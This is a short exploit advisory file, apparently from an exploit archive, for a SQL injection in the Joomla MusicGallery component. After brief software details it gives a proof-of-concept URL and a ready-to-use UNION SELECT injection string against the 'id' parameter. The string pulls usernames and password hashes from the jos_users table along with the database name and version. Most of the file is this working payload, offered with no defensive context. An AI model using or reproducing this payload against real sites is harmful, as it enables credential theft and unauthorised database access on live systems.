-
Notifications
You must be signed in to change notification settings - Fork 16
/
10050.txt
29 lines (16 loc) · 1.04 KB
/
10050.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Joomla Component MusicGallery SQL Injection Vulnerability
=========================================================
**************************************************************************/
[ Software Information ]
[+] Download : http://joomlacode.org/gf/project/musicgallery/
[+] Developer Info : Itamar Elharar
[+] Description : multimedia mp3 gallery by category.
[+] Development Status: 4 - Beta
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection
===========================================================================
[ Here we go.. Proof of Concept ]
http://server/index.php?option=com_musicgallery&task=itempage&id=[INDONESIANCODER]
[ Exploit ]
index.php?option=com_musicgallery&task=itempage&id=-23+union+select+1,1,concat%28username,0x3a,password%29,1,database%28%29,666,1,version%28%29,0x446f6e2054756b756c6573746f,1,2009,0x496e646f6e657369616e20436f646572,1,1,1+from+jos_users--&Itemid=54
===========================================================================